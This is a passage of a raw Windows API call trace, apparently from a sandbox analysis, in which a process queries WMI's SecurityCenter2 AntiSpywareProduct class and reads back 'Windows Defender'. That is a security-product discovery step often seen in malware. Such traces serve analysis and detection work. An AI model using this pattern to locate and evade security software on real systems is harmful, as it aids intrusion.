pProxy=0x663528, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0266.532] IUnknown:Release (This=0x66352c) returned 0x2 [0266.532] WbemLocator:IUnknown:Release (This=0x66fe70) returned 0x1 [0266.532] CoTaskMemFree (pv=0x54bc0b8) [0266.533] IUnknown:QueryInterface (in: This=0x663528, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed0c | out: ppvObject=0x19ed0c*=0x66fe70) returned 0x0 [0266.533] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ecc8 | out: ppvObject=0x19ecc8*=0x0) returned 0x80004002 [0266.535] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19eae4 | out: ppvObject=0x19eae4*=0x0) returned 0x80004002 [0266.536] IUnknown:QueryInterface (in: This=0x663528, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e8bc | out: ppvObject=0x19e8bc*=0x0) returned 0x80004002 [0266.537] WbemLocator:IUnknown:AddRef (This=0x66fe70) returned 0x3 [0266.537] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e624 | out: ppvObject=0x19e624*=0x0) returned 0x80004002 [0266.538] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e5d4 | out: ppvObject=0x19e5d4*=0x0) returned 0x80004002 [0266.538] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e5e0 | out: ppvObject=0x19e5e0*=0x66fdcc) returned 0x0 [0266.538] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66fdcc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e5e8 | out: pCid=0x19e5e8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.538] WbemLocator:IUnknown:Release (This=0x66fdcc) returned 0x3 [0266.538] CoGetContextToken (in: pToken=0x19e640 | out: pToken=0x19e640) returned 0x0 [0266.538] CoGetContextToken (in: pToken=0x19ea48 | out: pToken=0x19ea48) returned 0x0 [0266.538] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ead8 | out: ppvObject=0x19ead8*=0x66fe54) returned 0x0 [0266.539] WbemLocator:IRpcOptions:Query (in: This=0x66fe54, pPrx=0x66fe70, dwProperty=2, pdwValue=0x19eb00 | out: pdwValue=0x19eb00) returned 0x80004002 [0266.539] WbemLocator:IUnknown:Release (This=0x66fe54) returned 0x3 [0266.539] WbemLocator:IUnknown:Release (This=0x66fe70) returned 0x2 [0266.539] CoGetContextToken (in: pToken=0x19f020 | out: pToken=0x19f020) returned 0x0 [0266.539] CoGetContextToken (in: pToken=0x19ef80 | out: pToken=0x19ef80) returned 0x0 [0266.539] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x19f050*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f04c | out: ppvObject=0x19f04c*=0x663528) returned 0x0 [0266.539] IUnknown:AddRef (This=0x663528) returned 0x4 [0266.539] IUnknown:Release (This=0x663528) returned 0x3 [0266.539] IUnknown:Release (This=0x663528) returned 0x2 [0266.539] IUnknown:Release (This=0x663398) returned 0x2 [0266.539] SysStringLen (param_1=0x0) returned 0x0 [0266.539] IEnumWbemClassObject:Reset (This=0x663528) returned 0x0 [0266.540] CoTaskMemAlloc (cb=0x4) returned 0x54ba558 [0266.540] IEnumWbemClassObject:Next (in: This=0x663528, lTimeout=-1, uCount=0x1, apObjects=0x54ba558, puReturned=0x2401740 | out: apObjects=0x54ba558*=0x553ac60, puReturned=0x2401740*=0x1) returned 0x0 [0266.541] IUnknown:QueryInterface (in: This=0x553ac60, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e8d0 | out: ppvObject=0x19e8d0*=0x553ac60) returned 0x0 [0266.541] IUnknown:QueryInterface (in: This=0x553ac60, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e88c | out: ppvObject=0x19e88c*=0x0) returned 0x80004002 [0266.541] IUnknown:QueryInterface (in: This=0x553ac60, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e6ac | out: ppvObject=0x19e6ac*=0x0) returned 0x80004002 [0266.541] IUnknown:QueryInterface (in: This=0x553ac60, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e484 | out: ppvObject=0x19e484*=0x0) returned 0x80004002 [0266.541] IUnknown:AddRef (This=0x553ac60) returned 0x3 [0266.542] IUnknown:QueryInterface (in: This=0x553ac60, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e1ec | out: ppvObject=0x19e1ec*=0x0) returned 0x80004002 [0266.542] IUnknown:QueryInterface (in: This=0x553ac60, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e19c | out: ppvObject=0x19e19c*=0x0) returned 0x80004002 [0266.542] IUnknown:QueryInterface (in: This=0x553ac60, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e1a8 | out: ppvObject=0x19e1a8*=0x553ac64) returned 0x0 [0266.542] IMarshal:GetUnmarshalClass (in: This=0x553ac64, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e1b0 | out: pCid=0x19e1b0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0266.542] IUnknown:Release (This=0x553ac64) returned 0x3 [0266.542] CoGetContextToken (in: pToken=0x19e208 | out: pToken=0x19e208) returned 0x0 [0266.542] CoGetContextToken (in: pToken=0x19e610 | out: pToken=0x19e610) returned 0x0 [0266.542] IUnknown:QueryInterface (in: This=0x553ac60, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e6a0 | out: ppvObject=0x19e6a0*=0x0) returned 0x80004002 [0266.542] IUnknown:Release (This=0x553ac60) returned 0x2 [0266.542] CoGetContextToken (in: pToken=0x19ebe0 | out: pToken=0x19ebe0) returned 0x0 [0266.542] CoGetContextToken (in: pToken=0x19eb40 | out: pToken=0x19eb40) returned 0x0 [0266.542] IUnknown:QueryInterface (in: This=0x553ac60, riid=0x19ec10*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19ec0c | out: ppvObject=0x19ec0c*=0x553ac60) returned 0x0 [0266.542] IUnknown:AddRef (This=0x553ac60) returned 0x4 [0266.542] IUnknown:Release (This=0x553ac60) returned 0x3 [0266.542] IUnknown:Release (This=0x553ac60) returned 0x2 [0266.542] CoTaskMemFree (pv=0x54ba558) [0266.542] CoGetContextToken (in: pToken=0x19ef48 | out: pToken=0x19ef48) returned 0x0 [0266.542] IUnknown:AddRef (This=0x553ac60) returned 0x3 [0266.542] IWbemClassObject:Get (in: This=0x553ac60, wszName="__GENUS", lFlags=0, pVal=0x19f25c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f2dc*=0, plFlavor=0x19f2d8*=0 | out: pVal=0x19f25c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f2dc*=3, plFlavor=0x19f2d8*=64) returned 0x0 [0266.543] IWbemClassObject:Get (in: This=0x553ac60, wszName="__PATH", lFlags=0, pVal=0x19f240*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f2c4*=0, plFlavor=0x19f2c0*=0 | out: pVal=0x19f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\ROOT\\SecurityCenter2:AntiSpywareProduct.instanceGuid=\"{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}\"", varVal2=0x0), pType=0x19f2c4*=8, plFlavor=0x19f2c0*=64) returned 0x0 [0266.543] SysStringByteLen (bstr="\\\\XC64ZB\\ROOT\\SecurityCenter2:AntiSpywareProduct.instanceGuid=\"{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}\"") returned 0xcc [0266.543] SysStringByteLen (bstr="\\\\XC64ZB\\ROOT\\SecurityCenter2:AntiSpywareProduct.instanceGuid=\"{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}\"") returned 0xcc [0266.543] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f26c | out: ppv=0x19f26c*=0x601a94) returned 0x0 [0266.543] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f264 | out: pAptType=0x19f264*=1) returned 0x0 [0266.543] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f268 | out: ppvObject=0x19f268*=0x0) returned 0x80004002 [0266.543] IUnknown:Release (This=0x601a94) returned 0x1 [0266.544] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ebd8 | out: ppv=0x19ebd8*=0x54ba558) returned 0x0 [0266.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba558, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19edf0 | out: ppvObject=0x19edf0*=0x0) returned 0x80004002 [0266.544] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba558, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ee04 | out: ppvObject=0x19ee04*=0x5542ac0) returned 0x0 [0266.544] WbemDefPath:IUnknown:Release (This=0x54ba558) returned 0x0 [0266.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542ac0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea24 | out: ppvObject=0x19ea24*=0x5542ac0) returned 0x0 [0266.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542ac0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e9e0 | out: ppvObject=0x19e9e0*=0x0) returned 0x80004002 [0266.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542ac0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e5d4 | out: ppvObject=0x19e5d4*=0x0) returned 0x80004002 [0266.544] WbemDefPath:IUnknown:AddRef (This=0x5542ac0) returned 0x3 [0266.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542ac0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e33c | out: ppvObject=0x19e33c*=0x0) returned 0x80004002 [0266.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542ac0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e2ec | out: ppvObject=0x19e2ec*=0x0) returned 0x80004002 [0266.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542ac0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e2f8 | out: ppvObject=0x19e2f8*=0x5545080) returned 0x0 [0266.545] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5545080, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e300 | out: pCid=0x19e300*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.545] WbemDefPath:IUnknown:Release (This=0x5545080) returned 0x3 [0266.545] CoGetContextToken (in: pToken=0x19e358 | out: pToken=0x19e358) returned 0x0 [0266.545] CoGetContextToken (in: pToken=0x19e760 | out: pToken=0x19e760) returned 0x0 [0266.545] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542ac0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e7f0 | out: ppvObject=0x19e7f0*=0x0) returned 0x80004002 [0266.545] WbemDefPath:IUnknown:Release (This=0x5542ac0) returned 0x2 [0266.545] WbemDefPath:IUnknown:Release (This=0x5542ac0) returned 0x1 [0266.545] CoGetContextToken (in: pToken=0x19f0e8 | out: pToken=0x19f0e8) returned 0x0 [0266.545] CoGetContextToken (in: pToken=0x19f048 | out: pToken=0x19f048) returned 0x0 [0266.545] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542ac0, riid=0x19f118*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f114 | out: ppvObject=0x19f114*=0x5542ac0) returned 0x0 [0266.545] WbemDefPath:IUnknown:AddRef (This=0x5542ac0) returned 0x3 [0266.545] WbemDefPath:IUnknown:Release (This=0x5542ac0) returned 0x2 [0266.545] WbemDefPath:IWbemPath:SetText (This=0x5542ac0, uMode=0x4, pszPath="\\\\XC64ZB\\ROOT\\SecurityCenter2:AntiSpywareProduct.instanceGuid=\"{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}\"") returned 0x0 [0266.545] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x55425f0, puCount=0x19f298 | out: puCount=0x19f298*=0x2) returned 0x0 [0266.545] WbemDefPath:IWbemPath:GetText (in: This=0x55425f0, lFlags=4, puBuffLength=0x19f294*=0x0, pszText=0x0 | out: puBuffLength=0x19f294*=0x19, pszText=0x0) returned 0x0 [0266.545] WbemDefPath:IWbemPath:GetText (in: This=0x55425f0, lFlags=4, puBuffLength=0x19f294*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x19f294*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0266.545] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x55425f0, puCount=0x19f264 | out: puCount=0x19f264*=0x2) returned 0x0 [0266.546] WbemDefPath:IWbemPath:GetText (in: This=0x55425f0, lFlags=4, puBuffLength=0x19f260*=0x0, pszText=0x0 | out: puBuffLength=0x19f260*=0x19, pszText=0x0) returned 0x0 [0266.546] WbemDefPath:IWbemPath:GetText (in: This=0x55425f0, lFlags=4, puBuffLength=0x19f260*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x19f260*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0266.546] IWbemClassObject:Get (in: This=0x553ac60, wszName="displayName", lFlags=0, pVal=0x19f260*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2402024*=0, plFlavor=0x2402028*=0 | out: pVal=0x19f260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Windows Defender", varVal2=0x0), pType=0x2402024*=8, plFlavor=0x2402028*=0) returned 0x0 [0266.547] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0266.547] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0266.547] IWbemClassObject:Get (in: This=0x553ac60, wszName="displayName", lFlags=0, pVal=0x19f268*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2402024*=8, plFlavor=0x2402028*=0 | out: pVal=0x19f268*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Windows Defender", varVal2=0x0), pType=0x2402024*=8, plFlavor=0x2402028*=0) returned 0x0 [0266.547] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0266.547] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0266.547] CoTaskMemAlloc (cb=0x4) returned 0x54ba3d8 [0266.547] IEnumWbemClassObject:Next (in: This=0x663528, lTimeout=-1, uCount=0x1, apObjects=0x54ba3d8, puReturned=0x2401740 | out: apObjects=0x54ba3d8*=0x0, puReturned=0x2401740*=0x0) returned 0x1 [0266.547] CoTaskMemFree (pv=0x54ba3d8) [0266.548] CoGetContextToken (in: pToken=0x19f198 | out: pToken=0x19f198) returned 0x0 [0266.548] WbemLocator:IUnknown:Release (This=0x66fe70) returned 0x1 [0266.548] IUnknown:Release (This=0x663528) returned 0x0 [0266.548] CoGetContextToken (in: pToken=0x19f198 | out: pToken=0x19f198) returned 0x0 [0266.548] WbemLocator:IUnknown:Release (This=0x66ff70) returned 0x1 [0266.548] IUnknown:Release (This=0x663398) returned 0x0 [0266.549] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f288 | out: ppv=0x19f288*=0x601a94) returned 0x0 [0266.549] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f280 | out: pAptType=0x19f280*=1) returned 0x0 [0266.549] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f284 | out: ppvObject=0x19f284*=0x0) returned 0x80004002 [0266.549] IUnknown:Release (This=0x601a94) returned 0x1 [0266.550] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ebf0 | out: ppv=0x19ebf0*=0x54ba4d8) returned 0x0 [0266.550] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba4d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ee08 | out: ppvObject=0x19ee08*=0x0) returned 0x80004002 [0266.550] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba4d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ee1c | out: ppvObject=0x19ee1c*=0x5542510) returned 0x0 [0266.551] WbemDefPath:IUnknown:Release (This=0x54ba4d8) returned 0x0 [0266.551] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542510, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea3c | out: ppvObject=0x19ea3c*=0x5542510) returned 0x0 [0266.551] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542510, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e9f8 | out: ppvObject=0x19e9f8*=0x0) returned 0x80004002 [0266.551] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542510, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e5ec | out: ppvObject=0x19e5ec*=0x0) returned 0x80004002 [0266.551] WbemDefPath:IUnknown:AddRef (This=0x5542510) returned 0x3 [0266.551] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542510, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e354 | out: ppvObject=0x19e354*=0x0) returned 0x80004002 [0266.551] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542510, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e304 | out: ppvObject=0x19e304*=0x0) returned 0x80004002 [0266.551] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542510, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e310 | out: ppvObject=0x19e310*=0x5545050) returned 0x0 [0266.551] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5545050, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e318 | out: pCid=0x19e318*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.551] WbemDefPath:IUnknown:Release (This=0x5545050) returned 0x3 [0266.551] CoGetContextToken (in: pToken=0x19e370 | out: pToken=0x19e370) returned 0x0 [0266.551] CoGetContextToken (in: pToken=0x19e778 | out: pToken=0x19e778) returned 0x0 [0266.551] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542510, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e808 | out: ppvObject=0x19e808*=0x0) returned 0x80004002 [0266.551] WbemDefPath:IUnknown:Release (This=0x5542510) returned 0x2 [0266.551] WbemDefPath:IUnknown:Release (This=0x5542510) returned 0x1 [0266.551] CoGetContextToken (in: pToken=0x19f100 | out: pToken=0x19f100) returned 0x0 [0266.552] CoGetContextToken (in: pToken=0x19f060 | out: pToken=0x19f060) returned 0x0 [0266.552] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542510, riid=0x19f130*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, 